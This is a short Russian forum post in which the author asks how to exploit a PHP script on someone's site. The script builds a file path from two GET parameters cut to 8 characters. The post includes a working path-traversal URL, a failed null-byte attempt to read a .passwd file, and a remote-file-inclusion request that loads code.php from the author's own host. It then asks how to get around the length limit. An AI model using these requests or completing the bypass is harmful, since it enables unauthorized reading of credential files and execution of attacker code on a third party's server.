народ, помогите.

есть сайт www.sait.ru

скрипт www.sait.ru/text.php имхо бажный. методом GET передаются два параметра p & n

генерация страницы просиходит примерно следующим образом

$path = substr($_GET['p'],0,8)."/".substr($_GET['n'],0,8).'.htm';
///
$x = fopen($path, 'w');
///
require($path);

если в корне лежит title.htm, то при www.sait.ru/text.php?p=news&n=../title
выведет ее.
одна проблема: оба параметра обрезаются до 8 символов... Как это можно обойти?? в корне также лежит .passwd Никак не могу его вывести, т.к. он считает и %00, и название файла получается больше 8 символов, это бесит.. я не знаю как убрать слеш, чтоб ввести название двумя параметрами... Также не могу исполнить там свой скрипт с другого хоста.. пробовал www.sait.ru/text.php?p=http:/&n=moysait.ru/code.php%00
но никак не укладываюсь в 8 символов.

заранее спасибо